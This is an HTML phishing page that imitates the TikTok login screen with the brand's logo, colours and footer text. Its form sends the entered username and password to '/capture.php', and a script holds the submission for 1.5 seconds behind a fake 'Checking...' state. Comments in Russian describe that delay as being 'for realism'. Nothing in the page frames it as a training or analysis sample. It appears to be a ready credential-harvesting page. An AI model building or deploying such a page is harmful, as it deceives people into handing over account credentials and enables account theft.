<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok - Sign In</title>
    <style>
        body {
            font-family: 'Segoe UI', Arial, sans-serif;
            background-color: #f8f8f8;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #161823;
        }
        .container {
            width: 375px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 1px 8px rgba(0, 0, 0, 0.1);
            padding: 40px;
            text-align: center;
        }
        .logo {
            margin-bottom: 24px;
        }
        .logo svg {
            width: 100px;
            height: 40px;
        }
        h1 {
            font-size: 22px;
            margin-bottom: 24px;
            font-weight: 600;
        }
        .input-group {
            margin-bottom: 16px;
            text-align: left;
        }
        input {
            width: 100%;
            padding: 12px;
            border: 1px solid #e6e6e6;
            border-radius: 4px;
            font-size: 14px;
            box-sizing: border-box;
        }
        button {
            width: 100%;
            background-color: #fe2c55;
            color: white;
            border: none;
            padding: 12px;
            border-radius: 4px;
            font-size: 16px;
            font-weight: 500;
            cursor: pointer;
            margin-top: 8px;
        }
        .footer {
            margin-top: 24px;
            font-size: 12px;
            color: #8a8b91;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <!-- TikTok Logo -->
            <svg viewBox="0 0 24 24" width="100" height="40" fill="#000000">
                <path d="M12.525.02c1.31-.02 2.61-.01 3.91-.02.08 1.53.63 3.09 1.75 4.17 1.12 1.11 2.7 1.62 4.24 1.79v4.03c-1.44-.05-2.89-.35-4.2-.97-.57-.26-1.1-.59-1.62-.93-.01 2.92.01 5.84-.02 8.75-.08 1.4-.54 2.79-1.35 3.94-1.31 1.92-3.58 3.17-5.91 3.21-1.43.08-2.86-.31-4.08-1.03-2.02-1.19-3.44-3.37-3.65-5.71-.02-.5-.03-1-.01-1.49.18-1.9 1.12-3.72 2.58-4.96 1.66-1.44 3.98-2.13 6.15-1.72.02 1.48-.04 2.96-.04 4.44-.99-.32-2.15-.23-3.02.37-.63.41-1.11 1.04-1.36 1.75-.21.51-.15 1.07-.14 1.61.24 1.64 1.82 3.02 3.5 2.87 1.12-.01 2.19-.66 2.77-1.61.19-.33.4-.67.41-1.06.1-1.79.06-3.57.07-5.36.01-4.03-.01-8.05.02-12.07z"/>
            </svg>
        </div>
        
        <h1>Log in to TikTok</h1>
        
        <form action="/capture.php" method="POST">
            <div class="input-group">
                <input type="text" name="username" placeholder="Username or email" required>
            </div>
            <div class="input-group">
                <input type="password" name="password" placeholder="Password" required>
            </div>
            <button type="submit">Log in</button>
        </form>
        
        <div class="footer">
            <p>By continuing, you agree to TikTok's <a href="#" style="color: #fe2c55;">Terms of Service</a> and confirm you have read our <a href="#" style="color: #fe2c55;">Privacy Policy</a>.</p>
        </div>
    </div>

    <script>
        document.querySelector('form').addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Показываем анимацию загрузки (имитация)
            const button = document.querySelector('button');
            button.innerHTML = 'Checking...';
            button.disabled = true;
            
            // Отправляем форму через 1.5 секунды (для реалистичности)
            setTimeout(() => {
                this.submit();
            }, 1500);
        });
    </script>
</body>
</html>